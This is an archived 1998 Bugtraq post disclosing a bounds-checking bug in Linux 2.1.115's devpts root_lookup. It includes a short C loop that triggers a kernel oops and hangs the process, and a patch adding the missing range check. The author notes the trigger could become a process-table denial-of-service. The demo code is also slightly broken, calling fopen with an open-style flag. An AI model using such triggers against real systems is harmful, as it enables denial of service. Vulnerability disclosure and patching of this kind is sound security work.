Bugtraq mailing list archives
Linux 2.1.115 oops (demo and fix)
From: dps () IO STARGATE CO UK (Duncan Simpson)
Date: Thu, 13 Aug 1998 19:02:40 +0100
2.1.115 devpts contains a bug that can prevent you from unmounting file systems and the exploit program sticks in uninteruptable sleep until you reboot. It may be possible to trash kernel data structures using the bug with difficulty. I have yet to both ends of a pty using ptmx and devpts. I assume other version are vulnerable too. For pruposes of demonstrating the bug assume devpts is mounted on /dev/pts. My observations suggest the following program should tickle the bug: /* devpts bug tickler, hits 2.1.115 */ /* WARNING: This program enters unteruptable sleep when the kernel * oopes, so real programmers can turn this into a process table * eating DoS attack. */ int main(void) { int i,fd; char name[256]; i=257; while(1) { sprintf(name, "/dev/pts/%d", i); fd=fopen(name, O_RDWR); i++; } } The bug is a bounds chekcing failure in the root_lookup function in linux/fs/devpts/root.c. Here is a patch that fixes the bug. Given it is referencing memory it should not be viewing and the bad data is passed back to real_lookup (which promptly oopes) more spectacular effects may be possible. The only way to use a terminal running such a program again is after rebooting apparently due to the uninteruptable sleep the program that made the system call enters. --- fs/devpts/root.c.dist Thu Aug 13 17:54:17 1998 +++ fs/devpts/root.c Thu Aug 13 17:56:54 1998 @@ -159,6 +159,8 @@ entry += (*p++ - '0'); } } + if (entry>=sbi->max_ptys) /* Check range of number */ + return 0; dentry->d_inode = sbi->inodes[entry]; if ( dentry->d_inode )
Current thread:
- Re: Eudora executes (Java) URL, (continued)
- Re: Eudora executes (Java) URL Vitiello, Eric (Aug 11)
- Re: Eudora executes (Java) URL James Wetterau (Aug 11)
- Re: Eudora executes (Java) URL Alec Kosky (Aug 11)
- Re: Eudora executes (Java) URL John D. Hardin (Aug 11)
- Cisco IOS software security notice security-alert () cisco com (Aug 12)
- Re: Eudora executes (Java) URL High Tide (Aug 12)
- Re: RotoRouter 1.0 - Traceroute log & fake Julian Assange (Aug 11)
- DoS in Flowpoint 2000 DSL routers Jason Ackley (Aug 11)
- Re: DoS in Flowpoint 2000 DSL routers Tom (Aug 11)
- Re: DoS in Flowpoint 2000 DSL routers Jason Ackley (Aug 12)
- Linux 2.1.115 oops (demo and fix) Duncan Simpson (Aug 13)
- Re: Linux 2.1.115 oops (demo and fix) Chris Wedgwood (Aug 13)
- [rootshell] Security Bulletin #22 DeadSock (Aug 14)
- Linux 2.1.115 devpts bug improved fix Duncan Simpson (Aug 13)
- Re: Eudora executes (Java) URL Vitiello, Eric (Aug 11)